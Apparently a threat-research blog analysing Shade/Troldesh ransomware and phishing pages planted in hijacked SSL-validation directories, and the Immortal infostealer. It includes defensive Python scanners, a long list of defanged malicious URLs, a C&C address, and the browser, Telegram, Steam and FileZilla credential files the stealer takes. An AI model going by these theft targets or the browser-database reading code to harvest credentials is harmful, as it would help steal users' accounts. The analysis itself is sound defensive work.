Case I: Shade/Troldesh ransomware under the hidden directory
The graph below shows the Shade/Troldesh ransomware under the hidden directory that we detected last month.
Fig 4: Shade/Troldesh ransomware hits over one month
In the case of Shade/Troldesh ransomware, every compromised site has three types of files: HTML, ZIP, and EXE (.jpg), as shown below.
Fig 5: Shade in hidden SSL validation directory
inst.htm and thn.htm are HTML files that redirect to download ZIP files. reso.zip, rolf.zip, and stroi-invest.zip are ZIP files that contain the JavaScript file. msg.jpg and msges.jpg are EXE files that are the Shade ransomware.
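The file set above (HTML redirectors, ZIP droppers, and PE executables renamed to .jpg) is easy to spot from the server side because a validation directory should hold nothing but challenge tokens. The following is an added example (not code from the post or from any CA's tooling) of a Python scan over the two validation directories that builds a throwaway web root with constructed sample files; the sample file names echo Fig 5 and the IOC list, the token name is the http-01 example token from RFC 8555, and the file contents are dummies. The allowed-name rule assumes ACME http-01 naming (base64url token, no extension); tune it for any other validation scheme your CA uses.

```python
import os
import re
import tempfile

# Directories the post describes attackers abusing: ACME http-01 challenges and
# cPanel-style pki-validation both live under /.well-known/ on the web root.
VALIDATION_DIRS = ("acme-challenge", "pki-validation")

# An ACME http-01 challenge file is named after its token: base64url characters,
# no extension. Anything else in that directory deserves a look.
ACME_TOKEN_NAME = re.compile(r"^[A-Za-z0-9_-]{20,}$")

# File-type magic that should never appear in a validation directory:
# PE executables start with "MZ", ZIP archives with "PK\x03\x04".
MAGIC = ((b"MZ", "pe_executable"), (b"PK\x03\x04", "zip_archive"))


def classify(path):
    """Return a verdict for a suspicious file, or None if it looks like a
    normal validation token. Content is checked before the name, so an
    executable renamed to .jpg is still caught."""
    name = os.path.basename(path)
    with open(path, "rb") as fh:
        head = fh.read(4)
    for magic, label in MAGIC:
        if head.startswith(magic):
            return label
    if name.lower().endswith((".htm", ".html")):
        return "html_redirector_candidate"
    if ACME_TOKEN_NAME.match(name):
        return None
    return "unexpected_name"


def scan_well_known(webroot):
    """Walk the validation directories under webroot and list suspicious files
    as (relative path, verdict) pairs."""
    findings = []
    for sub in VALIDATION_DIRS:
        d = os.path.join(webroot, ".well-known", sub)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            if os.path.isfile(p):
                verdict = classify(p)
                if verdict:
                    findings.append((f".well-known/{sub}/{name}", verdict))
    return findings


def build_demo_webroot():
    """Create a throwaway web root with constructed sample data (not files from
    any compromised site): one legitimate token plus planted files named like
    the ones in Fig 5."""
    root = tempfile.mkdtemp(prefix="wellknown-demo-")
    acme = os.path.join(root, ".well-known", "acme-challenge")
    pki = os.path.join(root, ".well-known", "pki-validation")
    os.makedirs(acme)
    os.makedirs(pki)
    token = "evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA"   # RFC 8555 example token
    samples = {
        os.path.join(acme, token): (token + ".dummy-thumbprint").encode(),
        os.path.join(acme, "msg.jpg"): b"MZ\x90\x00" + b"\x00" * 60,   # PE renamed to .jpg
        os.path.join(acme, "inst.htm"): b"<html><meta http-equiv=refresh content='0;url=reso.zip'></html>",
        os.path.join(pki, "rolf.zip"): b"PK\x03\x04" + b"\x00" * 26,
        os.path.join(pki, "mxr.pdf"): b"MZ\x90\x00",                  # PE renamed to .pdf
    }
    for path, data in samples.items():
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for entry in scan_well_known(build_demo_webroot()):
        print(entry)
```

Run against a real web root this belongs in a periodic integrity job alongside the CMS's own file checks; validation directories are written to rarely (only at certificate issuance or renewal), so any file appearing outside those windows is worth an alert on its own.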
Fig 6: Shade Infection chain
Troldesh is typically spread by malspam with a ZIP attachment or a link to an HTML redirector page, which downloads the ZIP file. The malspam pretends to be an order update coming from a Russian organization. An example of an email that has the link of the HTML redirector is shown below.
Fig 7: Malspam mail
Fig 8: Redirector to download ZIP
The ZIP file contains only the JavaScript file with a Russian name. The JavaScript is highly obfuscated and encrypted strings are decrypted at runtime by the below function.
Fig 9: Decryption function
After decryption, the JavaScript has the functionality shown below. It tries to connect to one of two URLs, downloads the payload into %TEMP%, and executes it.
Fig 10: Simplified JavaScript code
The downloaded payload is the new variant of Shade/Troldesh ransomware, which has been around since 2014. It has two layers of packers: custom and UPX. After unpacking, it saves its configurations in “HKEY_LOCAL_MACHINE\SOFTWARE\System32\Configuration”.
Fig 11: Shade configuration
xcnt – Count of encrypted files
xi – ID of the infected machine
xpk – RSA public key used for encryption
xVersion – Version of the current Shade ransomware build
The command-and-control (C&C) server is a4ad4ip2xzclh6fd[.]onion; the malware drops a Tor client in %TEMP% to reach it. For each file, the content and the file name are encrypted separately with AES-256 in CBC mode, using two different keys. After encryption, the file is renamed to BASE64(AES(file_name)).ID_of_infected_machine.crypted000007.
Fig 12: Encrypted files
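The naming scheme above gives incident responders a cheap, high-precision sweep: besides the .crypted000007 suffix, the first segment must be valid base64 whose decoded length is a whole number of 16-byte AES blocks, because CBC output always is. The script below is an added example, not the ransomware's code or the post's: it parses encrypted names, groups them by the embedded victim ID, and picks up the README1.txt to README10.txt ransom notes. The victim ID's exact format is not documented in the post, so the parser only assumes it contains no dots or path separators; the file listing it runs on is constructed.

```python
import base64
import binascii
import re
from collections import defaultdict

# Shade renames each encrypted file to
#     BASE64(AES-256-CBC(original_name)).<victim_id>.crypted000007
# The victim ID format is not documented; assumption: no dots or separators.
SHADE_NAME_RE = re.compile(
    r"^(?P<b64>[A-Za-z0-9+/]+={0,2})\.(?P<victim>[^./\\]+)\.crypted000007$"
)
# Ransom notes README1.txt ... README10.txt dropped on the desktop.
SHADE_NOTE_RE = re.compile(r"^README(?:[1-9]|10)\.txt$", re.IGNORECASE)
AES_BLOCK = 16


def parse_shade_name(name):
    """Return {'victim_id', 'cipher_len'} for a Shade-encrypted file name, or
    None. The base64 prefix must decode to a multiple of the AES block size;
    anything else is a false positive or a truncated name."""
    m = SHADE_NAME_RE.match(name)
    if not m:
        return None
    try:
        blob = base64.b64decode(m.group("b64"), validate=True)
    except (binascii.Error, ValueError):
        return None
    if not blob or len(blob) % AES_BLOCK:
        return None
    return {"victim_id": m.group("victim"), "cipher_len": len(blob)}


def sweep(paths):
    """Group Shade-encrypted files by victim ID and collect ransom-note paths
    from a list of file paths (as produced by a directory walk)."""
    encrypted, notes = defaultdict(list), []
    for path in paths:
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        info = parse_shade_name(name)
        if info:
            encrypted[info["victim_id"]].append(path)
        elif SHADE_NOTE_RE.match(name):
            notes.append(path)
    return {"encrypted": dict(encrypted), "notes": notes}


def sample_paths():
    """Constructed listing: two files 'encrypted' for one victim (the base64
    segments are stand-ins of valid AES-block length), one decoy whose prefix
    decodes to 11 bytes, one ransom note and one benign file."""
    c16 = base64.b64encode(bytes(range(16))).decode()
    c32 = base64.b64encode(bytes(range(32))).decode()
    bad = base64.b64encode(b"not-a-block").decode()
    victim = "ABCDEF0123456789"
    return [
        f"C:\\Users\\bob\\Documents\\{c16}.{victim}.crypted000007",
        f"C:\\Users\\bob\\Pictures\\{c32}.{victim}.crypted000007",
        f"C:\\Users\\bob\\Documents\\{bad}.{victim}.crypted000007",
        "C:\\Users\\bob\\Desktop\\README3.txt",
        "C:\\Users\\bob\\Desktop\\notes.txt",
    ]


if __name__ == "__main__":
    result = sweep(sample_paths())
    for victim, files in result["encrypted"].items():
        print(f"victim {victim}: {len(files)} encrypted file(s)")
    print("ransom notes:", result["notes"])
```

Feed it the output of a recursive listing of the affected shares; the victim-ID grouping tells you quickly whether one host or several did the encrypting, which matters when the same share was hit from multiple machines.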
It drops a copy of itself at %ProgramData%\Windows\csrss.exe and creates a Run entry named "BurnAware" for that copy. It drops README1.txt through README10.txt on the desktop and changes the wallpaper as shown below.
Fig 13: Shade wallpaper
The README files contain the ransom note in both Russian and English.
Fig 14: Shade ransom note
Fig 15: Zscaler sandbox report for Shade/Troldesh ransomware
Case II: Phishing pages under the hidden directory
The graph below shows the different types of phishing pages under the hidden directory that we detected last month.
Fig 16: Phishing hits over one month
The phishing pages we have seen so far under these SSL-validation directories target Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and others.
Fig 17: OneDrive phishing page
Fig 18: Yahoo phishing page
Fig 19: DHL phishing page
IOCs:
aioshipping[.]com/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com/.well-known/pki-validation/mxr.pdf rangtrangxinh[.]vn/.well-known/acme-challenge/msg.jpg judge[.]education/.well-known/pki-validation/ssj.jpg hoadaklak[.]com/.well-known/acme-challenge/ssj.jpg nguyenlinh[.]vn/.well-known/acme-challenge/msg.jpg rdsis[.]in/.well-known/pki-validation/msg.jpg khanlanhdaklak[.]com/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg aioshipping[.]com:80/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com:80/.well-known/pki-validation/mxr.pdf vinhomeshalongxanh[.]xyz:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj:80/.well-known/pki-validation/msg.jpg dichvucong[.]vn:80/.well-known/acme-challenge/msg.jpg myphamnarguerite[.]com:80/.well-known/acme-challenge/mxr.pdf minifyurl[.]net:80/.well-known/pki-validation/mxr.pdf judge[.]education:80/.well-known/pki-validation/ssj.jpg minifyurl[.]net/.well-known/pki-validation/mxr.pdf neccotweethearts[.]com:80/.well-known/pki-validation/mxr.pdf backuptest[.]tomward.org.uk:80/.well-known/pki-validation/ssj.jpg mobshop[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg neccotweethearts[.]com/.well-known/pki-validation/mxr.pdf myphamnarguerite[.]com/.well-known/acme-challenge/mxr.pdf khanlanhdaklak[.]com:80/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de/.well-known/acme-challenge/messg.jpg mobshop[.]schmutzki.de/.well-known/acme-challenge/messg.jpg globalkabar[.]com/.well-known/pki-validation/sserv.jpg ereservices[.]com:80/.well-known/pki-validation/ssj.jpg dulichvietlao[.]vn:80/.well-known/acme-challenge/ssj.jpg backuptest[.]tomward.org.uk/.well-known/pki-validation/ssj.jpg mamycloth[.]store:80/.well-known/acme-challenge/msg.jpg business[.]driverclub.co:80/.well-known/pki-validation/msg.jpg vinhomeshalongxanh[.]xyz/.well-known/pki-validation/ssj.jpg dichvucong[.]vn/.well-known/acme-challenge/msg.jpg 
thuducland[.]net/.well-known/acme-challenge/sserv.jpg sahabathasyim[.]com/.well-known/acme-challenge/sserv.jpg rangtrangxinh[.]vn:80/.well-known/acme-challenge/msg.jpg lovecookingshop[.]com:80/.well-known/pki-validation/ssj.jpg ereservices[.]com/.well-known/pki-validation/ssj.jpg hoadaklak[.]com:80/.well-known/acme-challenge/ssj.jpg ceroshop[.]net/.well-known/acme-challenge/nba1.jpg thuducland[.]net:80/.well-known/acme-challenge/sserv.jpg lovecookingshop[.]com/.well-known/pki-validation/ssj.jpg entrenadorpersonalterrassa[.]com.es:80/.well-known/acme-challenge/mxr.pdf epifaniacr[.]net:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj/.well-known/pki-validation/msg.jpg globalkabar[.]com:80/.well-known/pki-validation/sserv.jpg sahabathasyim[.]com:80/.well-known/acme-challenge/sserv.jpg dulichvietlao[.]vn/.well-known/acme-challenge/ssj.jpg argfoodfest[.]e-zero.com.ar:80/.well-known/pki-validation/ssj.jpg aa[-]publisher.com:80/.well-known/mxr.pdf duandojiland[-]sapphire.com:80/.well-known/pki-validation/ssj.jpg master[-]of-bitcoin.net/.well-known/pki-validation/messg.jpg ea[-]no7.net/.well-known/pki-validation/messg.jpg tropictowersfiji[.]com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/msges.jpg tebarameatsfiji[.]com/.well-known/pki-validation/msg.jpg sbs[.]ipeary.com/.well-known/pki-validation/msges.jpg sbs[.]ipeary.com/.well-known/pki-validation/msg.jpg samyaksolution[.]co.in/.well-known/pki-validation/msges.jpg samyaksolution[.]co.in/.well-known/pki-validation/msg.jpg rosyheartsfiji[.]com/.well-known/pki-validation/pik.zip needcareers[.]com/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msg.jpg mytripland[.]com:80/.well-known/pki-validation/sserv.jpg learning[.]ipeary.com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/msg.jpg diennangmattroi[.]com/.well-known/pki-validation/msges.jpg 
diennangmattroi[.]com/.well-known/pki-validation/msg.jpg alonhadat24h[.]vn/.well-known/acme-challenge/update_2018_02.browser-components.zip 24bizhub[.]com/.well-known/pki-validation/msges.jpg 24bizhub[.]com/.well-known/pki-validation/msg.jpg thinkmonochrome[.]co.uk/.well-known/acme-challenge/messg.jpg test[.]digimarkting.com/.well-known/pki-validation/msg.jpg needcareers[.]com/.well-known/pki-validation/msg.jpg hanggiadungduc[.]vn/.well-known/acme-challenge/reso.zip designitpro[.]net/.well-known/acme-challenge/msg.jpg zanatika[.]com:80/.well-known/acme-challenge/ssj.jpg vina[.]fun:80/.well-known/acme-challenge/ssj.jpg nexusdental[.]com.mx/.well-known/acme-challenge/ssj.jpg neccotweethearts[.]com:80/.well-known/pki-validation/ssj.jpg jayc[-]productions.com:80/.well-known/acme-challenge/ssj.jpg indochine[-]mekong.com:80/.well-known/acme-challenge/ssj.jpg hexamersolution[.]com/.well-known/acme-challenge/msg.jpg hexacode[.]lk:80/.well-known/acme-challenge/ssj.jpg dongha[.]city:80/.well-known/acme-challenge/ssj.jpg domika[.]vn/.well-known/acme-challenge/msg.jpg coupanadda[.]in:80/.well-known/pki-validation/ssj.jpg choviahe[.]cf:80/.well-known/acme-challenge/ssj.jpg brace[-]dd.com/.well-known/pki-validation/msg.jpg angkaprediksi[.]fun/.well-known/acme-challenge/msg.jpg advancitinc[.]com/.well-known/pki-validation/msg.jpg vodai[.]bid/.well-known/pki-validation/ssj.jpg thucphammena[.]com/.well-known/acme-challenge/ssj.jpg thefoodgram[.]com/.well-known/acme-challenge/tehnikol.zip thefoodgram[.]com/.well-known/acme-challenge/stroi-industr.zip shopkimhuyen[.]com/.well-known/acme-challenge/msg.jpg shine[.]bmt.city/.well-known/acme-challenge/ssj.jpg sbs[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip needcareers[.]com/.well-known/pki-validation/tehnikol.zip needcareers[.]com/.well-known/pki-validation/stroi-industr.zip maithanhduong[.]com/.well-known/pki-validation/pik.zip luongynhiem[.]com/.well-known/pki-validation/gkpik.zip 
lichxuansaigon[.]com:80/.well-known/acme-challenge/ssj.jpg kinder[-]express.de/.well-known/acme-challenge/reso.zip khannen[.]com.vn/.well-known/acme-challenge/ssj.jpg jayc[-]productions.com/.well-known/acme-challenge/ssj.jpg jambanswers[.]org/.well-known/pki-validation/ssj.jpg intercontinentalglobalservice[.]com:80/.well-known/pki-validation/ssj.jpg gurusexpo[.]com.ng/.well-known/pki-validation/ssj.jpg gotrungtuan[.]online/.well-known/acme-challenge/ssj.jpg goindelivery[.]com/.well-known/pki-validation/major.zip fernandoherrera[.]me:80/.well-known/acme-challenge/ssj.jpg diennangmattroi[.]com/.well-known/pki-validation/stroi-industr.zip canhooceangate[.]com/.well-known/acme-challenge/sserv.jpg bramptonpharmacy[.]ca/.well-known/acme-challenge/msg.jpg bolt[-]fast.com/.well-known/pki-validation/gkpik.zip bmt[.]today/.well-known/acme-challenge/ssj.jpg blog[.]ponta-fukui.com/.well-known/pki-validation/pik.zip bhartivaish[.]com:80/.well-known/acme-challenge/ssj.jpg attireup[.]com/.well-known/acme-challenge/tehnikol.zip attireup[.]com/.well-known/acme-challenge/stroi-industr.zip acreationevents[.]com/.well-known/acme-challenge/msg.jpg yeu82[.]com/.well-known/acme-challenge/ssj.jpg yeu81[.]com/.well-known/acme-challenge/ssj.jpg yeu49[.]com/.well-known/acme-challenge/ssj.jpg yeu48[.]com/.well-known/acme-challenge/ssj.jpg vuacacao[.]com/.well-known/acme-challenge/ssj.jpg vision[-]ex.de/.well-known/acme-challenge/reso.zip vinaykhatri[.]in/.well-known/acme-challenge/ssj.jpg vinaykhatri[.]in/.well-known/acme-challenge/mxr.pdf variantmag[.]com/.well-known/acme-challenge/sserv.jpg valentinesblues[.]com/.well-known/pki-validation/sserv.jpg uyencometics[.]bmt.city/.well-known/acme-challenge/ssj.jpg tysonfury[.]rocks/.well-known/acme-challenge/msg.jpg tulipremodeling[.]com/.well-known/acme-challenge/sserv.jpg tropictowersfiji[.]com/.well-known/pki-validation/pik.zip thesaturnring[.]com/.well-known/acme-challenge/mxr.pdf theotokis[.]gr/.well-known/pki-validation/mxr.pdf 
thefashionelan[.]com/.well-known/pki-validation/msg.jpg tanione[.]com:80/.well-known/acme-challenge/ssj.jpg tanione[.]com/.well-known/acme-challenge/ssj.jpg steeveriano[.]com/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip shafercharacter[.]org/.well-known/acme-challenge/messg.jpg service[.]baynuri.net/.well-known/acme-challenge/messg.jpg samyaksolution[.]co.in/.well-known/pki-validation/rolf.zip realman[.]work/.well-known/acme-challenge/reso.zip rarejewelry[.]net/.well-known/acme-challenge/mxr.pdf rarejewelry[.]net/.well-known/acme-challenge/messg.jpg qsongchihotel[.]com/.well-known/acme-challenge/ssj.jpg panama[.]driverclub.co/.well-known/pki-validation/pic.zip ngheve[.]com/.well-known/acme-challenge/ssj.jpg nfc[.]com.vn/.well-known/acme-challenge/msg.jpg next[-]vision.ro/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/mxr.pdf neelshivamlaw[.]com/.well-known/pki-validation/pic.inform.zip neccotweethearts[.]com/.well-known/pki-validation/ssj.jpg navegacaolacet[.]com.br/.well-known/acme-challenge/msg.jpg mytripland[.]com/.well-known/pki-validation/ssj.jpg myschoolmarket[.]com.ng/.well-known/acme-challenge/ssj.jpg mskhangroup[.]com/.well-known/pki-validation/pic.zip mskhangroup[.]com/.well-known/pki-validation/msg.jpg morganbits[.]com/.well-known/acme-challenge/mxr.pdf mo7o[.]fun:80/.well-known/acme-challenge/mxr.pdf mitsubishidn[.]com.vn/.well-known/acme-challenge/sserv.jpg meliscar[.]com:80/.well-known/pki-validation/ssj.jpg meliscar[.]com/.well-known/pki-validation/ssj.jpg manhattan[.]dangcaphoanggia.com/.well-known/acme-challenge/mxr.pdf maithanhduong[.]com/.well-known/pki-validation/msg.jpg lichxuansaigon[.]com/.well-known/acme-challenge/ssj.jpg lemon[-]remodeling.com/.well-known/acme-challenge/sserv.jpg lastra[.]top/.well-known/pki-validation/msg.jpg laflamme[-]heli.com/.well-known/acme-challenge/ssj.jpg 
laflamme[-]heli.com/.well-known/acme-challenge/sserv.jpg kousen[.]fire-navi.jp/.well-known/pki-validation/msg.jpg jambanswers[.]org/.well-known/pki-validation/vseros.bank.zakaz.docx.zip integramultimedia[.]com.mx/.well-known/acme-challenge/ssj.jpg incgoin[.]com/.well-known/pki-validation/reso.zip hexacode[.]lk/.well-known/acme-challenge/ssj.jpg happysungroup[.]de/.well-known/pki-validation/ssj.jpg goindelivery[.]com/.well-known/pki-validation/reso.zip goindelivery[.]com/.well-known/pki-validation/msg.jpg goindelivery[.]com/.well-known/pki-validation/kia.zip gnb[.]uz/.well-known/pki-validation/ssj.jpg geecee[.]co.za/.well-known/pki-validation/msg.jpg geecee[.]co.za/.well-known/pki-validation/kia.zip gdn[.]segera.live/.well-known/pki-validation/sserv.jpg fijidirectoryonline[.]com/.well-known/pki-validation/msg.jpg fastimmo[.]fr/.well-known/acme-challenge/sserv.jpg ereservices[.]com/.well-known/pki-validation/sserv.jpg ede[.]coffee/.well-known/acme-challenge/ssj.jpg dongydaisinhduong[.]com/.well-known/acme-challenge/messg.jpg diota[-]ar.com:80/.well-known/acme-challenge/mxr.pdf diota[-]ar.com/.well-known/acme-challenge/mxr.pdf diamondking[.]co/.well-known/pki-validation/sserv.jpg dev01[.]europeanexperts.com/.well-known/pki-validation/messg.jpg designitpro[.]net/.well-known/acme-challenge/reso.zip damuoigiasi[.]com/.well-known/acme-challenge/ssj.jpg dailynow[.]vn/.well-known/acme-challenge/msg.jpg choviahe[.]cf/.well-known/acme-challenge/ssj.jpg cellulosic[.]logicalatdemo.co.in/.well-known/pki-validation/ssj.jpg business[.]driverclub.co/.well-known/pki-validation/msg.jpg bhartivaish[.]com/.well-known/acme-challenge/sserv.jpg bcspremier[.]ru/promo/well-known/images/background_sm.jpg bcspremier[.]ru/promo/well-known/images/background_lg.jpg atiqah[.]my/.well-known/pki-validation/sserv.jpg aanarehabcenter[.]com:80/.well-known/pki-validation/ssj.jpg aanarehabcenter[.]com/.well-known/pki-validation/ssj.jpg 24bizhub[.]com/.well-known/pki-validation/tehnikol.zip 
24bizhub[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/reso.zip ipeari[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/stroi-invest.zip ipeari[.]com/.well-known/pki-validation/tehnikol.zip learning[.]ipeary.com/.well-known/pki-validation/msg.jpg learning[.]ipeary.com/.well-known/pki-validation/reso.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip learning[.]ipeary.com/.well-known/pki-validation/tehnikol.zip test[.]digimarkting.com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/reso.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-industr.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-invest.zip test[.]digimarkting.com/.well-known/pki-validation/tehnikol.zip SBS[.]ipeary.com/.well-known/pki-validation/msg.jpg SBS[.]ipeary.com/.well-known/pki-validation/reso.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip SBS[.]ipeary.com/.well-known/pki-validation/tehnikol.zip singleparentaustralia[.]com.au/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/msg.jpg natristhub[.]club/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/stroi-industr.zip natristhub[.]club/.well-known/pki-validation/stroi-invest.zip natristhub[.]club/.well-known/pki-validation/tehnikol.zip natristhub[.]club/.well-known/pki-validation/tehnikol1.zip
Categories: Security Posts
Immortal information stealer
Recently, the Zscaler ThreatLabZ team came across new information-stealer malware called Immortal, which is written in .NET and designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions. This blog provides an analysis of the data Immortal steals from browsers, the files it steals (and the applications it steals from), and what it does with the stolen data.
Immortal starts by creating a directory with a random name in the temp folder and then creates a password.log file at "\%Temp%\{Random_DirName}\password.log".
Immortal writes the malware name, the author's name, and the author's Telegram address to password.log, followed by the fields below:
Date: Current date and time “MM/dd/yyyy HH:mm:ss”
Windows Username: Username
HWID: MachineGuid
System: Operating system name
Browser info stealing
Immortal steals data from 24 browsers. It steals stored credentials, cookies, credit card data, and autofill data from the targeted browsers.
When the user saves a username and password in a targeted browser, the browser stores them in the "Login Data" file, an SQLite database; cookies are stored in the "Cookies" file, and autofill entries, credit card data, and other web-form data in the "Web Data" file. The file paths (under the local application data folder) are:
“\%AppData%\Local\{Browser}\User Data\Default\Login Data”
“\%AppData%\Local\{Browser}\User Data\Default\Web Data”
“\%AppData%\Local\{Browser}\User Data\Default\Cookies”
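For incident scoping it helps to know exactly what those three SQLite files give an attacker, because a stealer reads them with ordinary SQL. The script below is an added example (not Immortal's code or the post's): it copies each database out from under the running browser and lists the tables a stealer targets, returning saved logins per site, cookie hosts, card holders and autofill entries. It deliberately leaves out password_value, encrypted_value and card_number_encrypted, which Chromium stores encrypted under the user's DPAPI context; the goal is to enumerate exposure, not recover secrets. The schema it builds for the demo is a constructed minimal subset of Chromium's real tables.

```python
import shutil
import sqlite3
import tempfile
from pathlib import Path

# Chromium profile files and the tables/columns a stealer reads from them.
# password_value, cookies.encrypted_value and card_number_encrypted are stored
# encrypted (bound to the Windows user via DPAPI), so they are not selected.
PROFILE_TABLES = {
    "Login Data": [("logins", "origin_url, username_value")],
    "Cookies": [("cookies", "host_key, name")],
    "Web Data": [("credit_cards", "name_on_card, expiration_month, expiration_year"),
                 ("autofill", "name, value")],
}


def read_table(profile_dir, db_file, table, columns):
    """Read one table from a profile database. Works on a copy, because a
    running browser keeps the original open and may hold a lock on it."""
    src = Path(profile_dir) / db_file
    if not src.is_file():
        return []
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / db_file
        shutil.copy2(src, copy)
        con = sqlite3.connect(copy)
        try:
            return con.execute(f"SELECT {columns} FROM {table}").fetchall()
        except sqlite3.DatabaseError:   # missing table or not a Chromium file
            return []
        finally:
            con.close()


def exposure_report(profile_dir):
    """Everything an infostealer with file access would have obtained from one
    Chromium profile: saved logins per site, cookie hosts, cards, autofill."""
    report = {}
    for db_file, tables in PROFILE_TABLES.items():
        for table, columns in tables:
            report[table] = read_table(profile_dir, db_file, table, columns)
    return report


def _create(path, *statements):
    """Helper for the constructed profile: (sql, rows-or-None) pairs."""
    con = sqlite3.connect(path)
    with con:
        for stmt, rows in statements:
            if rows is None:
                con.execute(stmt)
            else:
                con.executemany(stmt, rows)
    con.close()


def build_sample_profile(root):
    """Constructed profile directory carrying a minimal subset of the Chromium
    schema (the real tables have many more columns)."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    opaque = b"\x01\x00\x00\x00" + b"\x00" * 8   # placeholder for an encrypted blob
    _create(root / "Login Data",
            ("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)", None),
            ("INSERT INTO logins VALUES (?, ?, ?)",
             [("https://mail.example.test/", "alice", opaque),
              ("https://bank.example.test/", "alice.b", opaque)]))
    _create(root / "Cookies",
            ("CREATE TABLE cookies (host_key TEXT, name TEXT, encrypted_value BLOB)", None),
            ("INSERT INTO cookies VALUES (?, ?, ?)", [(".example.test", "session", opaque)]))
    _create(root / "Web Data",
            ("CREATE TABLE credit_cards (name_on_card TEXT, expiration_month INTEGER, "
             "expiration_year INTEGER, card_number_encrypted BLOB)", None),
            ("INSERT INTO credit_cards VALUES (?, ?, ?, ?)", [("ALICE B", 12, 2027, opaque)]),
            ("CREATE TABLE autofill (name TEXT, value TEXT)", None),
            ("INSERT INTO autofill VALUES (?, ?)", [("email", "alice@example.test")]))
    return root


def demo():
    """Build the constructed profile in a temp dir and report on it."""
    with tempfile.TemporaryDirectory() as tmp:
        return exposure_report(build_sample_profile(Path(tmp) / "Default"))


if __name__ == "__main__":
    for table, rows in demo().items():
        print(f"{table}: {len(rows)} row(s)")
        for row in rows:
            print("   ", row)
```

Point `exposure_report()` at a real `User Data\Default` directory (from a forensic image, or the live host) to get the list of sites whose credentials and sessions must be reset after an Immortal infection.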
List of targeted browsers:
Chrome
Yandex
Orbitum
Opera
Amigo
CentBrowser
Torch
Comodo
Go!
ChromePlus
Uran
BlackHawk
CoolNovo
AcWebBrowser
Epic Browser
Baidu Spark
Rockmelt
Sleipnir
SRWare Iron
Titan Browser
Flock
Vivaldi
Sputnik
Maxthon
Credential stealing
The malware fetches credentials from the “Login Data” file and stores them in the password.log file as per the format below: Path: ” \%Temp%\{Random_DirName}\password.log”.
SiteUrl: Website URL
Login: Username
Password: Password
Program: Targeted browser
Cookie stealing
Immortal fetches cookie data from the cookies file and stores it in {Browsername}_cookies.txt file.
Path: “\%Temp%\{Random_DirName}\Cookies\{Browsername_cookies.txt}". The format is shown below.
Credit card data
Immortal fetches credit card data from the “Web Data” file and stores it in the {Browsername}_CC.txt file.
Path: “\%AppData%\{Random_DirName}\CC\{Browsername_CC.txt}”. The format is shown below.
Autofill data
The autofill feature of a browser lets the user store commonly entered web-form information: usernames, email addresses, passwords, postal addresses, and credit card details. When the user later opens a web form, the browser fills in the saved values automatically. The autofill information is stored in the "Web Data" file.
Immortal reads autofill data from the "Web Data" file and stores it in the {Browsername}_Autofill.txt file.
Path: “\%AppData%\{Random_DirName}\Autofill\{Browsername_Autofill.txt}”. The format is shown below.
File stealing
Immortal steals files from many different applications. The details are below.
Minecraft launchers
The malware steals user data and session files from Minecraft launcher applications, copying them into "%Temp%\{Random_DirName}\Applications\{AppName}\". The following launchers are targeted:
MinecraftOnly
McSkill
LavaCraft
MinecraftLauncher
VimeWorld
RedServer
Steam
The malware also steals files from the Steam client, the platform for playing, discussing, and creating games. The files stolen by Immortal are:
SSFN (2 files)
VDF files from the config folder
Config.vdf
loginusers.vdf
Telegram and Discord
Immortal also steals session-related files from Telegram and Discord. Telegram is a cloud-based instant messaging and voice over IP service. Discord is the cross-platform voice and text chat application designed to help gamers talk to each other in real time. Immortal copies those files into “%Temp%\{Random_Name}\Applications\{AppName}\”.
File Path:
%AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\
%AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map0
%AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map1
%AppData%\discord\Local Storage\https_discordapp.com_0.localstorage
FileZilla
Immortal steals files that contain FileZilla credentials. FileZilla is a known FTP tool used for file transfer. The malware copies the below files into “\%Temp%\{Random_DirName}\FileZilla\”.
\%AppData%\Filezilla\recentservers.xml
\%AppData%\Filezilla\sitemanager.xml
Bitcoin-Qt wallet
